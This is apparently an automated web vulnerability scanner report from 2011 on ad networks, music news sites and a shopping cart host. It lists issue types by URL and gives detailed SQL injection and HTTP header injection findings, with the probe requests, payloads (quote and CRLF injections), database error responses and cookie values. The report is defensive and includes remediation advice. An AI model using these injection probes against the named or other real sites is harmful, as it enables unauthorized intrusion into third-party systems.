12.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

12.2. http://ads.adbrite.com/adserver/vdi/742697

12.3. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

12.4. http://api.twitter.com/1/statuses/user_timeline.json

12.5. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

12.6. http://ib.adnxs.com/ttj

12.7. http://oads.mochila.com/openx/www/delivery/ajs.php

12.8. http://www.apture.com/js/apture.js

12.9. http://www.facebook.com/plugins/like.php

12.10. http://www.facebook.com/plugins/likebox.php

13. Cross-domain POST

13.1. http://asthmatickitty.com/

13.2. http://asthmatickitty.com/news.php

13.3. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

13.4. http://www.nme.com/news/sufjan-stevens/56527

14. SSL cookie without secure flag set

14.1. https://www.ccnow.com/cgi-local/cart.cgi

14.2. https://www.ccnow.com/cgi-local/checkout.cgi

14.3. https://www.ccnow.com/cgi-local/sc_cart.cgi

15. Cross-domain Referer leakage

15.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs

15.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784

15.3. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

15.4. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

15.5. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

15.6. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

15.7. http://ad.yieldmanager.com/iframe3

15.8. http://ad.yieldmanager.com/iframe3

15.9. http://admeld.adnxs.com/usersync

15.10. http://ads.pointroll.com/PortalServe/

15.11. http://ads.revsci.net/adserver/ako

15.12. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874578%7C0%7C2530%7CADTECH

15.13. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874579%7C0%7C225%7CADTECH

15.14. http://cas.clickability.com/cas/cas.js

15.15. http://cas.clickability.com/cas/cas.js

15.16. http://cas.clickability.com/cas/cas.js

15.17. http://cas.clickability.com/cas/cas.js

15.18. http://cas.clickability.com/cas/cas.js

15.19. http://cas.clickability.com/cas/cas.js

15.20. http://choices.truste.com/ca

15.21. http://choices.truste.com/ca

15.22. http://cm.g.doubleclick.net/pixel

15.23. http://cm.g.doubleclick.net/pixel

15.24. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH

15.25. http://ib.adnxs.com/ab

15.26. http://ib.adnxs.com/if

15.27. http://ib.adnxs.com/if

15.28. http://ib.adnxs.com/ptj

15.29. http://imp.fetchback.com/serve/fb/imp

15.30. http://media.adfrontiers.com/pq

15.31. http://mediacdn.disqus.com/1304703476/build/system/disqus.js

15.32. http://mf.sitescout.com/disp

15.33. http://tag.contextweb.com/TagPublish/getad.aspx

15.34. http://www.ccnow.com/cgi-local/cart.cgi

15.35. http://www.ccnow.com/cgi-local/sc_cart.cgi

15.36. http://www.facebook.com/plugins/comments.php

15.37. http://www.facebook.com/plugins/like.php

15.38. http://www.facebook.com/plugins/likebox.php

15.39. http://www.facebook.com/plugins/likebox.php

15.40. http://www.google.com/trends/hottrends

15.41. http://www.google.com/trends/hottrends

15.42. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

16. Cross-domain script include

16.1. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

16.2. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3

16.3. http://ads.revsci.net/adserver/ako

16.4. http://asthmatickitty.com/

16.5. http://asthmatickitty.com/news.php

16.6. http://ib.adnxs.com/if

16.7. http://ib.adnxs.com/if

16.8. http://media.adfrontiers.com/pq

16.9. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

16.10. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

16.11. http://tag.contextweb.com/TagPublish/getad.aspx

16.12. http://www.ccnow.com/cgi-local/cart.cgi

16.13. http://www.ccnow.com/cgi-local/sc_cart.cgi

16.14. https://www.ccnow.com/cgi-local/cart.cgi

16.15. https://www.ccnow.com/cgi-local/checkout.cgi

16.16. https://www.ccnow.com/cgi-local/sc_cart.cgi

16.17. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

16.18. http://www.clashmusic.com/user/a

16.19. http://www.clashmusic.com/user/password

16.20. http://www.clashmusic.com/user/register

16.21. http://www.facebook.com/plugins/comments.php

16.22. http://www.facebook.com/plugins/like.php

16.23. http://www.facebook.com/plugins/likebox.php

16.24. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

16.25. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html

16.26. http://www.nme.com/news/sufjan-stevens/56527

16.27. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story

16.28. http://www.orlandosentinel.com/business/transparent

16.29. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

16.30. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

17. File upload functionality

18. TRACE method is enabled

18.1. http://alvenda.122.2o7.net/

18.2. http://ie-stat.bmmetrix.com/

18.3. http://imp.fetchback.com/

18.4. http://ipcmedia.122.2o7.net/

18.5. http://optimized-by.rubiconproject.com/

18.6. http://secure-au.imrworldwide.com/

19. Email addresses disclosed

19.1. http://ads.adbrite.com/adserver/vdi/742697

19.2. http://asthmatickitty.com/

19.3. http://asthmatickitty.com/news.php

19.4. http://cdn11.surphace.com/javascript/omniture_h15.js

19.5. http://mediacdn.disqus.com/1304703476/build/system/disqus.js

19.6. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js

19.7. http://w.sharethis.com/button/buttons.js

19.8. http://widgets.twimg.com/j/2/widget.css

19.9. http://widgets.twimg.com/j/2/widget.js

19.10. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.css

19.11. http://www.clashmusic.com/sites/all/modules/shadowbox/shadowbox/src/skin/classic/skin.js

19.12. http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages

19.13. http://www.floridatoday.com/odygel/lib/legacy/GDN/GDNpreload.js

19.14. http://www.floridatoday.com/odygel/lib/userauth/validateform.js

19.15. http://www.indianasnewscenter.com/includes/granite_js_lib.js

19.16. http://www.irishtimes.com/js/s_code.js

19.17. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html

19.18. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

20. Private IP addresses disclosed

20.1. http://api.facebook.com/restserver.php

20.2. http://connect.facebook.net/en_GB/all.js

20.3. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

20.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.5. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/uBEmPS-MH2t.js

20.6. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png

20.7. http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/qWIGt6WPRA1.js

20.8. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/dMZead4v66-.js

20.9. http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/RxZwFAf4oY9.js

20.10. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png

20.11. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

20.12. http://www.facebook.com/extern/login_status.php

20.13. http://www.facebook.com/extern/login_status.php

20.14. http://www.facebook.com/extern/login_status.php

20.15. http://www.facebook.com/extern/login_status.php

20.16. http://www.facebook.com/extern/login_status.php

20.17. http://www.facebook.com/plugins/comments.php

20.18. http://www.facebook.com/plugins/comments.php

20.19. http://www.facebook.com/plugins/like.php

20.20. http://www.facebook.com/plugins/like.php

20.21. http://www.facebook.com/plugins/like.php

20.22. http://www.facebook.com/plugins/like.php

20.23. http://www.facebook.com/plugins/like.php

20.24. http://www.facebook.com/plugins/like.php

20.25. http://www.facebook.com/plugins/like.php

20.26. http://www.facebook.com/plugins/like.php

20.27. http://www.facebook.com/plugins/like.php

20.28. http://www.facebook.com/plugins/like.php

20.29. http://www.facebook.com/plugins/like.php

20.30. http://www.facebook.com/plugins/like.php

20.31. http://www.facebook.com/plugins/like.php

20.32. http://www.facebook.com/plugins/like.php

20.33. http://www.facebook.com/plugins/like.php

20.34. http://www.facebook.com/plugins/like.php

20.35. http://www.facebook.com/plugins/like.php

20.36. http://www.facebook.com/plugins/like.php

20.37. http://www.facebook.com/plugins/like.php

20.38. http://www.facebook.com/plugins/like.php

20.39. http://www.facebook.com/plugins/like.php

20.40. http://www.facebook.com/plugins/like.php

20.41. http://www.facebook.com/plugins/like.php

20.42. http://www.facebook.com/plugins/like.php

20.43. http://www.facebook.com/plugins/like.php

20.44. http://www.facebook.com/plugins/like.php

20.45. http://www.facebook.com/plugins/like.php

20.46. http://www.facebook.com/plugins/like.php

20.47. http://www.facebook.com/plugins/likebox.php

20.48. http://www.facebook.com/plugins/likebox.php

21. Credit card numbers disclosed

22. Robots.txt file

22.1. http://ad-apac.doubleclick.net/adj/onl.vine/music/blogs

22.2. http://ad.au.doubleclick.net/ad/N799.WhistleOut/B5381461.80

22.3. http://adserver.adtech.de/addyn%7C3.0%7C656%7C1497495%7C0%7C170%7CADTECH

22.4. http://adserverams.adtech.de/adperf%7C2.0%7C577%7C2951881%7C0%7C1%7CAdId=5763683

22.5. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

22.6. http://cspix.media6degrees.com/orbserv/hbpix

22.7. http://edge.viagogo.co.uk/feeds/widget.ashx

22.8. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

22.9. http://ie-stat.bmmetrix.com/V13a

22.10. http://imp.fetchback.com/serve/fb/adtag.js

22.11. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

22.12. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

22.13. http://l.addthiscdn.com/live/t00/250lo.gif

22.14. http://l.alvenda.net/e

22.15. http://p.addthis.com/pixel

22.16. http://s0.2mdn.net/dot.gif

22.17. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif

22.18. http://toolbarqueries.clients.google.com/tbproxy/af/query

22.19. http://va.px.invitemedia.com/pixel

22.20. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx

22.21. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

23. Cacheable HTTPS response

23.1. https://www.ccnow.com/cgi-local/cart.cgi

23.2. https://www.ccnow.com/cgi-local/checkout.cgi

23.3. https://www.ccnow.com/cgi-local/sc_cart.cgi

23.4. https://www.ccnow.com/favicon.ico

24. HTML does not specify charset

24.1. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784

24.2. http://ad-emea.doubleclick.net/adi/N4714.155049.CLASHMUSIC.COM/B5451784.2

24.3. http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26

24.4. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday

24.5. http://ad.yieldmanager.com/iframe3

24.6. http://ads.pointroll.com/PortalServe/

24.7. http://asthmatickitty.com/

24.8. http://asthmatickitty.com/news.php

24.9. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

24.10. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

24.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.12. http://cdn.apture.com/media/html/aptureLoadIframe.html

24.13. http://content.pulse360.com/cgi-bin/context.cgi

24.14. http://cookie.alvenda.com/v2_1/code/ExtractCookie.html

24.15. http://dx.nme.com/ifrm.html

24.16. http://media.adfrontiers.com/pq

24.17. http://mediacdn.disqus.com/1304703476/build/system/def.html

24.18. http://mediacdn.disqus.com/1304703476/build/system/reply.html

24.19. http://mediacdn.disqus.com/1304703476/build/system/upload.html

24.20. http://ping.chartbeat.net/ping

24.21. http://pixel.invitemedia.com/data_sync

24.22. http://uac.advertising.com/wrapper/aceUACping.htm

24.23. http://wd.sharethis.com/api/getCount2.php

24.24. http://widgets.surphace.com/partner/omniture/sphereomni_api.php

24.25. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

24.26. http://www.ccnow.com/cgi-local/cart.cgi

24.27. https://www.ccnow.com/cgi-local/cart.cgi

24.28. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

24.29. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

24.30. http://www.nme.com/hotspot/channel/news

24.31. http://www.orlandosentinel.com/hive/common/includes/google-adsense-content-orlnews.html

24.32. http://www.sufjan.com/

24.33. http://www.surphace.com/ads/rubicon_orlandosentinel

25. Content type incorrectly stated

25.1. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday

25.2. http://ads.pointroll.com/PortalServe/

25.3. http://ar.voicefive.com/b/rc.pli

25.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.5. http://cdn.apture.com/media/searchfilter.khtml.v30596971.js

25.6. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

25.7. http://content.pulse360.com/cgi-bin/context.cgi

25.8. http://event.adxpose.com/event.flow

25.9. http://imp.fetchback.com/serve/fb/adtag.js

25.10. http://l.apture.com/v3/

25.11. http://mediacdn.disqus.com/1304703476/fonts/disqus-webfont.woff

25.12. http://mediaforce.sitescout.netdna-cdn.com/ad150-c157549.jpg

25.13. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81

25.14. http://wd.sharethis.com/api/getCount2.php

25.15. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

25.16. http://www.ccnow.com/cgi-local/cart.cgi

25.17. http://www.ccnow.com/favicon.ico

25.18. http://www.ccnow.com/images/cart/ccnowcart_gray.jpg

25.19. https://www.ccnow.com/cgi-local/cart.cgi

25.20. https://www.ccnow.com/favicon.ico

25.21. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico

25.22. http://www.facebook.com/extern/login_status.php

25.23. http://www.floridatoday.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

25.24. http://www.nme.com/favicon.ico

26. Content type is not specified

26.1. http://ad.yieldmanager.com/st

26.2. http://pcm1.map.pulsemgr.com/uds/pc

26.3. http://www.meebo.com/cmd/tc

27. SSL certificate



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://l.alvenda.net/e [e parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://l.alvenda.net
Path:   /e

Issue detail

The e parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the e parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /e?s=12869239901192486&e=impression'&so=js-placement&c=5lnsx9b4&ty=b&m=RubiconRemarketing_ThomsonReuters HTTP/1.1
Host: l.alvenda.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 ERROR: unterminated quoted string at or near "'IMPRESSION'' ) " Position: 181
Date: Mon, 09 May 2011 14:06:48 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1506
Server: Jetty(6.1.22)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 ERROR: unterminated quoted string at or near "'IMPRESSION'' ) "
Position: 181</title>
</head>
...[SNIP]...

1.2. http://l.alvenda.net/e [so parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://l.alvenda.net
Path:   /e

Issue detail

The so parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the so parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /e?s=12869239901192486&e=impression&so=js-placement'&c=5lnsx9b4&ty=b&m=RubiconRemarketing_ThomsonReuters HTTP/1.1
Host: l.alvenda.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 ERROR: unterminated quoted string at or near "'JS-PLACEMENT'' ) " Position: 188
Date: Mon, 09 May 2011 14:06:48 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1510
Server: Jetty(6.1.22)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 ERROR: unterminated quoted string at or near "'JS-PLACEMENT'' ) "
Position: 188</title>
</hea
...[SNIP]...

1.3. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music/blogs'/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 09 May 2011 14:06:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /music/blogs''/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...

2. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.burst/B5229711.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 334dd%0d%0a6d942ec9952 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /334dd%0d%0a6d942ec9952/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/334dd
6d942ec9952
/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http: //www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI1r/K=ADS_T200/SZ=300X250A/V=2.3S//REDIRURL=;ord=14656
Date: Mon, 09 May 2011 14:03:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 48d26%0d%0a5aaccec468c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;ord=1304949640480?&48d26%0d%0a5aaccec468c=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;241011702;0-0;5;60840454;24/24;42008809/42026596/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;sz=24x24;dcmt=text/html;;48d26
5aaccec468c
=1;~cs=i:
Date: Mon, 09 May 2011 14:01:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1011

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;241011702;0-0;5;60840454;24/24;42008809/42026596/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;i
...[SNIP]...

2.3. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [secure parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/gannett_brevard_cim/floridatoday

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload c5c12%0d%0a7e45a7ac1ac was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/gannett_brevard_cim/floridatoday;secure=c5c12%0d%0a7e45a7ac1ac HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
